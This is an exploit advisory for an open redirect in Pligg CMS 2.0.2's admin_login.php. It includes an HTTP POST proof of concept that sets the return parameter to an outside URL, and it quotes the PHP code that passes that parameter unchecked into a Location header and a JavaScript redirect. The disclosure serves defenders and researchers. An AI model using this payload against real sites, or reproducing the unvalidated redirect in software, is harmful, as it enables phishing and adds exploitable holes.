# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability
# Google Dork: N/A
# Date: 2015/8/18
# Exploit Author: Arash Khazaei
# Vendor Homepage: pligg.com
# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2 (Last Version)
# Tested on: Kali , Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Site : http://bhunter.ir

Introduction :

Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL v 2.0.
An Open Redirect Vulnerability In admin_login.php File and return= Input .

# POC :

POST /pligg-cms-master/admin/admin_login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

username=admin&password=admin&processlogin=1&return=http://google.com

=====================

Vulnerable Code :

if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(),
"cgi") >= 0){
                    echo '<SCRIPT LANGUAGE="JavaScript">window.location="'
. $return . '";</script>';
                    echo
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href =
"'.$return.'">' .
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>';
                } else {
                    header('Location: '.$return);
                }
                die;



Discovered By : Arash Khazaei